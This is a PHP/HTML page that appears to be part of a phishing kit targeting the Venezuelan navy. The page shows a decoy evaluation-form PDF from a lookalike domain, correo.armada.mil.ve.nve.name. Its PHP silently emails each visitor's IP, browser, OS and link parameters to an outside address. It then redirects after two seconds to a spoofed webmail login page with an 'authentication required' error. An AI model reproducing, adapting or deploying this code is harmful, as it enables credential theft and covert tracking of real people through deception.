<?php 
$info=detect();
function detect()
{
    $browser=array("IE","OPERA","MOZILLA","NETSCAPE","FIREFOX","SAFARI","CHROME");
    $os=array("WIN","MAC","LINUX");
 
    # definimos unos valores por defecto para el navegador y el sistema operativo
    $info['browser'] = "OTHER";
    $info['os'] = "OTHER";
 
    # buscamos el navegador con su sistema operativo
    foreach($browser as $parent)
    {
        $s = strpos(strtoupper($_SERVER['HTTP_USER_AGENT']), $parent);
        $f = $s + strlen($parent);
        $version = substr($_SERVER['HTTP_USER_AGENT'], $f, 15);
        $version = preg_replace('/[^0-9,.]/','',$version);
        if ($s)
        {
            $info['browser'] = $parent;
            $info['version'] = $version;
        }
    }
 
    # obtenemos el sistema operativo
    foreach($os as $val)
    {
        if (strpos(strtoupper($_SERVER['HTTP_USER_AGENT']),$val)!==false)
            $info['os'] = $val;
    }
    return $info;
}
$fecha = date('r');
$ip = $_SERVER['REMOTE_ADDR'];
$pag=$_GET["id"];
$lnk=$_GET['wa'];
$pcusuario=php_uname();
$to_email = 'service@nve.name';
$subject ="Ok User 1 AR: ".$lnk. "  IP: ".$ip. " ID: " .$pag. "  Sistema Operativo:  ".$info['os']. "  Navegador:  ".$info["browser"]."  Version:  " .$info["version"].  " Fecha:  ".$fecha;
$message="Ok User 1 AR: ".$lnk." P: ".$pag. " I: " .$ip. "  ".$fecha;
$headers = 'From: service@nve.name';
mail($to_email,$subject,$message,$headers);
/*if($ip == "201.248.70.70"){
    header ('Location: https://correo.armada.mil.ve.nve.name/ZLoginWhatsThisAnchor/lognOp/log_out/Reg_Url/accounts/inbox/FMfcgzGrcjNszdrtrTxN/1/u/ogbl/files/RAD-268-25-REDILL.pdf');
}*/

header('refresh:2;url=https://correo.armada.mil.ve.nve.name/ZLoginWhatsThisAnchor/lognOp/log_out/Reg_Url/accounts/inbox/FMfcgzGrcjNszdrtrTxN/1/u/ogbl/logzba.php?wa='.$lnk.'&id='.$pag.'&ses=9ibezfh3zhno1u6n4xeynw8o8?loginOp=relogin&client=standard&loginErrorCode=service.AUTH_REQUIRED');

?>

<!DOCTYPE html>
<html lang="en">
  <head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Formato de Evaluación de Componentes Armada Nacional Bolivariano</title>

    
  </head>
  <body>

        <iframe src="https://correo.armada.mil.ve.nve.name/ZLoginWhatsThisAnchor/lognOp/log_out/Reg_Url/accounts/inbox/FMfcgzGrcjNszdrtrTxN/1/u/ogbl/files/Formato_Evaluacion_Componentes_ARB.pdf" style="width:100%; height:700px;" frameborder="0" >
        </iframe>

  </body>
</html>